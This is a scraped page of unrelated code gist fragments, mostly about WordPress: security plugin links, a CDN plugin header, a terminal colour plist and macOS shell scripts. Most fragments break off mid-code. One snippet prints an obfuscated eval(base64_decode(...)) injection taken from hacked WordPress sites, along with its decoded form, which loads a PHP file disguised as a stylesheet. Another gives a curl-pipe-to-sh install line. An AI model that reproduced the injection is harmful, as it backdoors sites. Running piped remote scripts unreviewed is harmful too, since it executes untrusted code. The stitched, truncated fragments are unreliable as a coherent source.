boogah

WP Bag of Tricks

1. Helpful Scripts/Plugins:

Hacks:

	http://wordpress.org/extend/plugins/tac/
	http://wordpress.org/extend/plugins/exploit-scanner/ (Can be extremely resource intensive.)
	http://wordpress.org/extend/plugins/wp-malwatch/

sivel

<?php
/*
Plugin Name: Sivel CDN
Plugin URI:   http://sivel.net/
Description:  Points media urls at a CDN
Version:      1.0
Author:       Matt Martz
Author URI:   http://sivel.net/
*/

kolber

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Cross-browser kerning-pairs & ligatures</title>
    <style>
      body { font-family: sans-serif; background: #f4f3f3; color: rgba(40, 30, 0, 1); width: 500px; margin: 80px auto; padding: 0px; }
      a { color: rgba(15, 10, 0, 0.8); text-decoration: none; border-bottom: 1px solid; padding: 1px 1px 0px; -webkit-transition: background 1s ease; }
      a:hover { background: rgba(0, 220, 220, 0.2); }
      p, li { line-height: 1.5; padding: 0em 1em 0em 0em; margin: 0em 0em 0.5em; }

boogah

I've been seeing this code crop up a lot in recent WordPress hacks:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL3VzZXIvZG9tYWluLmNvbS93cC1pbmNsdWRlcy9qcy90aW55bWNlL3RoZW1lcy9hZHZhbmNlZC9za2lucy93cF90aGVtZS9pbWcvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

The issue normally involves "wp-login.php" returning a blank page for users trying to get into "wp-admin".

Running that bit of nastiness thru a base64 decoder gets us this:

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/user/domain.com/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

heisters

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>Ansi 0 Color</key>
	<dict>
		<key>Blue Component</key>
		<real>0.19370138645172119</real>
		<key>Green Component</key>
		<real>0.15575926005840302</real>

jpcody

# It'd be great to get this running via AppleScript and sans Alfred if anyone with more knowledge than me knows how :)

### STEP 1
#!/bin/sh

# Save this file as /bin/rvm_ruby, and do chmod 755 /bin/rvm_ruby
# to give it the proper permissions
# From http://www.aeonscope.net/2011/05/29/connecting-alfred-to-bitly-via-ruby/

if [[ -s ~/.rvm/scripts/rvm ]]; then

splorp

Comment Blacklist for WordPress

Notice!

As of November 5th, 2013, this version of the blacklist will no longer be updated.

I have migrated the project to a full Git repository in order to better track changes, bugs, and feedback.

Check out Comment Blacklist for WordPress on GitHub.

PeteMall

<?php

add_action( 'init', 'wp_honeybadger_it' );

function wp_honeybadger_it() {
	remove_filter( 'the_content', 'capital_P_dangit', 11 );
	remove_filter( 'the_title', 'capital_P_dangit', 11 );
	remove_filter( 'comment_text', 'capital_P_dangit', 31 );

	// more to come...

luetkemj

// This gist is now maintained on github at https://github.com/luetkemj/wp-query-ref

<?php
/**
* WordPress Query Comprehensive Reference
* Compiled by luetkemj - luetkemj.github.io
*
* CODEX: http://codex.wordpress.org/Class_Reference/WP_Query#Parameters
* Source: https://core.trac.wordpress.org/browser/tags/4.9.4/src/wp-includes/query.php
*/

erikh

#!/usr/bin/env sh

##
# This is script with usefull tips taken from:
#   https://github.com/mathiasbynens/dotfiles/blob/master/.osx
#
# install it:
#   curl -sL https://raw.github.com/gist/2108403/hack.sh | sh
#